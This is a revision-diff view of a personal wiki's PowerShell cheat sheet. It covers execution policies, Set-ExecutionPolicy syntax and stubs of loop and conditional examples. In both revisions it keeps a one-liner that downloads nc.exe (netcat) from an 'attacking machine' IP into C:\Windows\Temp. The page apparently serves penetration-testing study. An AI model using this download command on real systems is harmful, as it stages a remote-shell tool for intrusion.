The gMan nixWiki

Because the mind is made of Teflon...

User Tools

Site Tools


cheat_sheets_ps

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revisionPrevious revision
Next revision
Previous revision
cheat_sheets_ps [2022/11/21 00:05] gmancheat_sheets_ps [2022/12/29 23:43] (current) gman
Line 1: Line 1:
 ====== Windows PowerShell ====== ====== Windows PowerShell ======
  
-A very useful one-liner to download file (nc.exe) from an attacking machine (IP 192.168.77.128) and save it in C:\Windows\Temp using the same name+===== Execution Policies ===== 
 + 
 +PowerShell (PS) execution policies determine your authorization to execute PS scripts or not:  
 +  **Restricted:** [default] Blocks all use of PS scripts 
 +  - **AllSigned:** Requires PS scripts to e signed by trusted publisher 
 +  - **RemoteSigned:** This is a common "normal" setting in many systems... 
 +    - Allows any PS script written on the local machine. 
 +    - But requires downloaded scripts to be signed by a trusted publisher. 
 +  - **Unrestricted:** Allows any PS script but prompts you for confirmation on downloaded scripts. 
 +  - **Bypass:** Allows any and all PS scripts. Have at it
 + 
 +Syntax for changing the PowerShell execution policy
  
 <code> <code>
-(New-Object System.Net.WebClient).DownloadFile("http://192.168.77.128/nc.exe", "C:\Windows\Temp\nc.exe")+Set-ExecutionPolicy [name] 
 +# Example: 
 +Set-ExecutionPolicy RemoteSigned
 </code> </code>
  
 ---- ----
  
-**Example: For Loop**+===== Example Code ===== 
 + 
 +==== One-Liner Download ==== 
 + 
 +A very useful one-liner to download a file (nc.exe) from an attacking machine (IP 192.168.77.128) and save it in C:\Windows\Temp using the same name:  
 + 
 +<code> 
 +(New-Object System.Net.WebClient).DownloadFile("http://192.168.77.128/nc.exe", "C:\Windows\Temp\nc.exe"
 +</code> 
 + 
 +==== For Loop ====
  
 <code> <code>
Line 27: Line 50:
 </code> </code>
  
----- +==== Conditional Stmt ====
- +
-**Example: Conditional**+
  
 <code> <code>
cheat_sheets_ps.1668989100.txt.gz · Last modified: by gman